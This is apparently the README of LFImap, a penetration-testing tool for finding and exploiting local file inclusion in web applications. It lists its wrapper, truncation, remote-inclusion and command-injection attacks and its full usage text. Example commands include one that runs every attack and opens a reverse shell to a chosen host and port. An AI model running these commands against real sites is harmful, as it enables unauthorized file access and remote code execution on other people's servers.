This project is in pre alpha. Release 1.0 coming soon.
Inspired by SQLmap!
- Filter wrapper for arbitrary file inclusion
- Data wrapper for remote command execution
- Input wrapper for remote command execution
- Expect wrapper for remote command execution
- File wrapper for arbitrary file inclusion
- Path truncation for arbitrary file inclusion
- Remote file inclusion for code execution
- Command injection for remote command execution
- Full control over how the requests are sent
- Test with arbitrary HTTP method
- Test with multiple specified HTTP headers
- Specification of custom injection point (default 'PWN') in headers or GET/form-data line
- Specification of delay after each request
- Specifying of web proxy to send requests through
- Option to output each request and response to a log file
- Quick mode that uses fewer payloads to test each endpoint
- Support for payload manipulation via url and base64 encoding(s)
- Support for automated reverse shell access upon successful remote code execution
usage: lfimap.py [-U [url]] [-F [urlfile]] [-C <cookie>] [-D <data>] [-H <header>] [-M <method>]
[-P <proxy>] [--useragent <agent>] [--referer <referer>] [--placeholder <name>]
[--delay <milis>] [--http-ok <number>] [--no-stop] [-f] [-i] [-d] [-e] [-t] [-r]
[-c] [-file] [-heur] [-a] [-n <U|B>] [-q] [-x] [--lhost <lhost>] [--lport <lport>]
[-wT <path>] [--use-long] [--log <file>] [-v] [-h]
LFImap, Local File Inclusion discovery and exploitation tool
MANDATORY:
-U [url] Specify url, Ex: "http://example.org/vuln.php?param=PWN"
-F [urlfile] Specify url wordlist (every line should have --param|"PWN")
GENERAL OPTIONS:
-C <cookie> Specify session cookie, Ex: "PHPSESSID=1943785348b45"
-D <data> Specify HTTP request form data
-H <header> Specify additional HTTP header(s). Ex: "X-Forwarded-For:127.0.0.1"
-M <method> Specify HTTP request method to use for testing
-P <proxy> Specify proxy. Ex: "http://127.0.0.1:8080"
--useragent <agent> Specify HTTP user agent header value
--referer <referer> Specify HTTP referer header value
--placeholder <name> Specify different testing placeholder value (default "PWN")
--delay <milis> Specify delay in miliseconds after each request
--http-ok <number> Specify http response code(s) to treat as valid
--no-stop Don't stop using same method upon findings
ATTACK TECHNIQUE:
-f, --filter Attack using filter wrapper
-i, --input Attack using input wrapper
-d, --data Attack using data wrapper
-e, --expect Attack using expect wrapper
-t, --trunc Attack using path truncation with wordlist (default "short.txt")
-r, --rfi Attack using remote file inclusion
-c, --cmd Attack using command injection
-file, --file Attack using file wrapper
-heur, --heuristics Test for miscellaneous vulns using heuristics
-a, --all Use all available testing methods
PAYLOAD OPTIONS:
-n <U|B> Specify additional payload encoding(s). "U" for URL, "B" for base64
-q, --quick Perform quick testing with few payloads
-x, --exploit Exploit to reverse shell if possible (Setup reverse listener first)
--lhost <lhost> Specify local ip address for reverse connection
--lport <lport> Specify local port number for reverse connection
WORDLIST OPTIONS:
-wT <path> Specify path to wordlist for truncation test modality
--use-long Use "wordlists/long.txt" wordlist for truncation test modality
OUTPUT OPTIONS:
--log <file> Output all requests and responses to specified file
OTHER:
-v, --verbose Print more detailed output when performing attacks
-h, --help Print this help message
1) All attacks with '-a' (filter, input, data, expect and file wrappers, remote file inclusion, command injection, XSS, error disclosure).
python3 lfimap.py -U "http://IP/vuln.php?param=PWN" -C "PHPSESSID=XXXXXXXX" -a
python3 lfimap.py -U "http://IP/vuln.php?param=PWN" -C "PHPSESSID=XXXXXXXX" -a --lhost IP --lport PORT -x
python3 lfimap.py -U "http://IP/index.php" -D "page=PWN" -a
If you notice any issues with the software, please open up an issue. I will gladly take a look at it and try to resolve it.
Pull requests are welcome.
[!] Disclaimer: Lfimap usage for attacking web applications without consent of the application owner is illegal. Developers assume no liability and are not responsible for any misuse and damage caused by using this program.